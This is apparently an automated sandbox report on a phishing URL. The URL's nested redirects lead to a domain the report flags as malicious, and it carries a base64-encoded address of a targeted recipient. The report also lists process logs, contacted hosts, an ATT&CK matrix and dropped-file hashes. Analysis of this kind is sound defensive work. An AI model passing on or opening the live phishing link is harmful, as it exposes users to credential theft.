    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252F8fi5.veracidep.ru%2525252F9rQQ7pYZ%2525252F%25252FGnrm%25252FJIy6AQ%25252FAQ%25252Fc8a642e1-b752-489d-a606-2e0c28c9f43c%25252F1%25252Fp3ItI-koyL%252FGnrm%252FJYy6AQ%252FAQ%252F96a81154-bc5a-4dec-811a-9ad4ee762256%252F1%252FydnKIiaQi0%2FGnrm%2FJoy6AQ%2FAQ%2F9c58c880-73af-4c48-9b37-4983856d006d%2F1%2FdSmT7Kur-Y/Gnrm/J4y6AQ/AQ/dd03067b-b850-464f-b99d-a4582f20c822/1/nPxHYVfVwy#aGVleW91bmcubGVlbUB0aGVodWJwcm9qZWN0Lm9yZw=="
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1960,i,7319135450339462896,13108798113578409364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4868 --field-trial-handle=1960,i,7319135450339462896,13108798113578409364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 --field-trial-handle=1960,i,7319135450339462896,13108798113578409364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4868 --field-trial-handle=1960,i,7319135450339462896,13108798113578409364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 --field-trial-handle=1960,i,7319135450339462896,13108798113578409364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Drive-by Compromise
    Windows Management Instrumentation2
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252F8fi5.veracidep.ru%2525252F9rQQ7pYZ%2525252F%25252FGnrm%25252FJIy6AQ%25252FAQ%25252Fc8a642e1-b752-489d-a606-2e0c28c9f43c%25252F1%25252Fp3ItI-koyL%252FGnrm%252FJYy6AQ%252FAQ%252F96a81154-bc5a-4dec-811a-9ad4ee762256%252F1%252FydnKIiaQi0%2FGnrm%2FJoy6AQ%2FAQ%2F9c58c880-73af-4c48-9b37-4983856d006d%2F1%2FdSmT7Kur-Y/Gnrm/J4y6AQ/AQ/dd03067b-b850-464f-b99d-a4582f20c822/1/nPxHYVfVwy#aGVleW91bmcubGVlbUB0aGVodWJwcm9qZWN0Lm9yZw==0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.130.137
      truefalse
        high
        www3.l.google.com
        172.217.18.14
        truefalse
          high
          play.google.com
          142.250.184.238
          truefalse
            high
            cdn.prod.website-files.com
            104.18.161.117
            truefalse
              high
              click.pstmrk.it
              34.248.248.118
              truefalse
                high
                www.google.com
                216.58.206.36
                truefalse
                  high
                  oeaeu71gzikiqt8roie5q75ctwhhbrlv33xxdegjxuarbh1znklc.chiblaispi.ru
                  104.21.112.1
                  truefalse
                    unknown
                    8fi5.veracidep.ru
                    188.114.96.3
                    truetrue
                      unknown
                      accounts.youtube.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://8fi5.veracidep.ru/9rQQ7pYZ/#aGVleW91bmcubGVlbUB0aGVodWJwcm9qZWN0Lm9yZw==true
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          34.248.248.118
                          click.pstmrk.itUnited States
                          16509AMAZON-02USfalse
                          216.58.206.74
                          unknownUnited States
                          15169GOOGLEUSfalse
                          172.217.18.14
                          www3.l.google.comUnited States
                          15169GOOGLEUSfalse
                          104.18.161.117
                          cdn.prod.website-files.comUnited States
                          13335CLOUDFLARENETUSfalse
                          104.21.64.1
                          unknownUnited States
                          13335CLOUDFLARENETUSfalse
                          142.250.185.227
                          unknownUnited States
                          15169GOOGLEUSfalse
                          216.58.206.36
                          www.google.comUnited States
                          15169GOOGLEUSfalse
                          151.101.130.137
                          code.jquery.comUnited States
                          54113FASTLYUSfalse
                          216.58.206.35
                          unknownUnited States
                          15169GOOGLEUSfalse
                          64.233.166.84
                          unknownUnited States
                          15169GOOGLEUSfalse
                          104.21.112.1
                          oeaeu71gzikiqt8roie5q75ctwhhbrlv33xxdegjxuarbh1znklc.chiblaispi.ruUnited States
                          13335CLOUDFLARENETUSfalse
                          151.101.194.137
                          unknownUnited States
                          54113FASTLYUSfalse
                          35.190.80.1
                          a.nel.cloudflare.comUnited States
                          15169GOOGLEUSfalse
                          172.217.18.110
                          unknownUnited States
                          15169GOOGLEUSfalse
                          142.250.186.138
                          unknownUnited States
                          15169GOOGLEUSfalse
                          142.250.186.35
                          unknownUnited States
                          15169GOOGLEUSfalse
                          142.250.110.84
                          unknownUnited States
                          15169GOOGLEUSfalse
                          1.1.1.1
                          unknownAustralia
                          13335CLOUDFLARENETUSfalse
                          172.217.16.206
                          unknownUnited States
                          15169GOOGLEUSfalse
                          216.58.206.67
                          unknownUnited States
                          15169GOOGLEUSfalse
                          142.251.5.84
                          unknownUnited States
                          15169GOOGLEUSfalse
                          142.250.185.238
                          unknownUnited States
                          15169GOOGLEUSfalse
                          142.250.181.227
                          unknownUnited States
                          15169GOOGLEUSfalse
                          239.255.255.250
                          unknownReserved
                          unknownunknownfalse
                          188.114.96.3
                          8fi5.veracidep.ruEuropean Union
                          13335CLOUDFLARENETUStrue
                          142.250.184.238
                          play.google.comUnited States
                          15169GOOGLEUSfalse
                          IP
                          192.168.2.16
                          192.168.2.7
                          192.168.2.6
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1586294
                          Start date and time:2025-01-09 00:13:29 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Sample URL:https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252F8fi5.veracidep.ru%2525252F9rQQ7pYZ%2525252F%25252FGnrm%25252FJIy6AQ%25252FAQ%25252Fc8a642e1-b752-489d-a606-2e0c28c9f43c%25252F1%25252Fp3ItI-koyL%252FGnrm%252FJYy6AQ%252FAQ%252F96a81154-bc5a-4dec-811a-9ad4ee762256%252F1%252FydnKIiaQi0%2FGnrm%2FJoy6AQ%2FAQ%2F9c58c880-73af-4c48-9b37-4983856d006d%2F1%2FdSmT7Kur-Y/Gnrm/J4y6AQ/AQ/dd03067b-b850-464f-b99d-a4582f20c822/1/nPxHYVfVwy#aGVleW91bmcubGVlbUB0aGVodWJwcm9qZWN0Lm9yZw==
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:18
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          Analysis Mode:stream
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal64.phis.win@23/27@28/211
                          • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 142.250.186.35, 172.217.18.110, 64.233.166.84, 142.250.181.238, 199.232.210.172, 142.250.186.78, 142.250.186.174, 216.58.206.74, 142.250.185.170, 142.250.185.74, 172.217.16.202, 142.250.186.74, 216.58.206.42, 216.58.212.170, 142.250.74.202, 142.250.184.202, 142.250.186.42, 172.217.18.106, 142.250.184.234, 142.250.185.138, 172.217.18.10, 142.250.185.106, 142.250.186.138
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
                          • Not all processes where analyzed, report is missing behavior information
                          • VT rate limit hit for: https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252F8fi5.veracidep.ru%2525252F9rQQ7pYZ%2525252F%25252FGnrm%25252FJIy6AQ%25252FAQ%25252Fc8a642e1-b752-489d-a606-2e0c28c9f43c%25252F1%25252Fp3ItI-koyL%252FGnrm%252FJYy6AQ%252FAQ%252F96a81154-bc5a-4dec-811a-9ad4ee762256%252F1%252FydnKIiaQi0%2FGnrm%2FJoy6AQ%2FAQ%2F9c58c880-73af-4c48-9b37-4983856d006d%2F1%2FdSmT7Kur-Y/Gnrm/J4y6AQ/AQ/dd03067b-b850-464f-b99d-a4582f20c822/1/nPxHYVfVwy#aGVleW91bmcubGVlbUB0aGVodWJwcm9qZWN0Lm9yZw==
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 22:14:00 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2673
                          Entropy (8bit):3.9852434861290122
                          Encrypted:false
                          SSDEEP:
                          MD5:BDD5D4BF5DE63AEA07D79574AFBECC04
                          SHA1:53646504AE2249E361172C985B425EE9B578946E
                          SHA-256:37DD474000EE2F0A12000B4C2E2FF17845A555496CC40A25EF5A5AB6A81567B6
                          SHA-512:748561D9CFADDAD29B28EF6C4C157F4B9A4E1596108974C0FAB0689CEFBD70AEF988CB3F2BFD029BCBF5577F3838D80BED89AE1D60F8B101BD24D3ACFE5FD865
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,....S.R.#b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............)vo.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 22:14:00 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2675
                          Entropy (8bit):4.000122209704717
                          Encrypted:false
                          SSDEEP:
                          MD5:DEFF5D73CE5669432A27DB7711FCDA9E
                          SHA1:6C8713F455D8C4F363E914551C27D29AD4A8112A
                          SHA-256:BC50D5ADE389B70C3FBFADC1ECE025737C1EDB16AB2D45B1D388106C9F7FE6FB
                          SHA-512:CC28FB7A884E8756F1871C24567E6C8153884926D4A6AF0B0E49F8D8A33594F341260405B5EB2B1637E2AF1740DB2369F86D95B64589584875F46A3C5CE0ABB4
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,....s.A.#b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............)vo.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2689
                          Entropy (8bit):4.012596965239812
                          Encrypted:false
                          SSDEEP:
                          MD5:3791583E1978ECE9CB00A7691690E2C8
                          SHA1:DC7E65499AB0739D677FED7CA82FED6F91FBF5F6
                          SHA-256:2227FB598E38C7B620D62C67E00910CEB7CD24CB11BB9675A68989071C988D1D
                          SHA-512:675C47A34046FB20EB78BF5E06F92D436C9F84C2C951FFD81C7AF1DFAB85081B02C9331E369306BF62E99D9C7431FB6E5DBEF1D2E80CB8509BE8BC4E6EF6B1E7
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............)vo.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 22:14:00 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2677
                          Entropy (8bit):4.001079366715443
                          Encrypted:false
                          SSDEEP:
                          MD5:CD248B4DC562FDCC326DBB4EFA580450
                          SHA1:15F9AB6F5E8A13283A8ACCE07F472E7DDAFDB394
                          SHA-256:A98DD3C8E36EF82C9A8FAF139031F2F30AF5041A591BCF4F4B7E77136B288467
                          SHA-512:C07BF8ECEE4D7DE37773BD49E18B824C3C2EA2C591165C1F24699A193C7D22D5A59B00544CAB38421D8CEB925DA21B0A96D1D9BDE699D7DA6C59CF8835F03291
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,.....;.#b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............)vo.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 22:14:00 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2677
                          Entropy (8bit):3.9890647445933056
                          Encrypted:false
                          SSDEEP:
                          MD5:1ACA6710B62A4B2ACAC6E91034C6B12F
                          SHA1:726FC018DD743B12EEC31C9C498D8FE4D06D72AA
                          SHA-256:457ACBE8A9F65E8B3A9402F28EF970740B214AC40B480AB92AA6CB7B00222108
                          SHA-512:76AC0FB7ADD4FAECE37E320DEC0676696BBD669128537AECF56B148AC4B5D8D12E889231B06EA8C9F713FF203F573C4D42FDA983EB158F7EBD4116AC152F78AF
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,......L.#b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............)vo.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 22:14:00 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2679
                          Entropy (8bit):3.997993727006162
                          Encrypted:false
                          SSDEEP:
                          MD5:02A83F917257C0C6681D913F6BCB01A8
                          SHA1:59D11EF58ED880681266C097100F0982AE233230
                          SHA-256:BA6BB1F2BD217D5C10259630B2B4967B80A535EBF6142A92186E892FDB41249B
                          SHA-512:89350B9C056D93023FFC3A530A0EFE5DA10A0303BD037D256F2A11BE30FCFBBFD6C522245E846F9DC84D864BFEA8EA31A73CEAC5FF8A6C0C412ACA3B406D68AA
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,....G.2.#b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............)vo.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (568)
                          Category:dropped
                          Size (bytes):778036
                          Entropy (8bit):5.791986961490468
                          Encrypted:false
                          SSDEEP:
                          MD5:E6E3D84559ED5167926D72D74FFC882C
                          SHA1:CE97CFEBCFE02FCF1F53818235394B57B38A9193
                          SHA-256:B0000F3A3C3845F1E50B109469E92A81F20FC87958DB53534EFBC51B934DFAD4
                          SHA-512:8368598978CF515686D45237162F7D63F7E0CA5831CCA7C57BF91A4C3E04EF1A4F4A7DCE0B9EB14F51DF04E6F9C706D6EC61AA62B81F020088EB0E0A1E65A560
                          Malicious:false
                          Reputation:unknown
                          Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x24a60d89, 0x1be1, 0x6970ff1, 0x12280dd0, 0x6420, 0x0, 0x2c000000, 0x2c000001, 0xc3, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var baa,daa,Qa,Ua,gaa,iaa,jb,qaa,xaa,Ab,Jaa,Laa,Oaa,Mb,Paa,Sb,Ub,Vb,Qaa,Raa,Wb,Saa,Taa,Uaa,$b,Zaa,aba,hc,fba,hba,iba,qc,rc,mba,nba,pba,rba,sba,wba,zba,tba,yba,xba,vba,uba,Aba,Bba,Cba,Jba,Mba,Oba,Pba,Lba,Rba,Oc,Tba,Vba,aca,bca,cca,dca,eca,fca,Zba,$ba,lca,oca,qca,rca,sca,tca,wca,yca,xca,Aca,Cd,
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):16
                          Entropy (8bit):3.5
                          Encrypted:false
                          SSDEEP:
                          MD5:F1C9C44E663E7E62582E3F5B236C1C72
                          SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
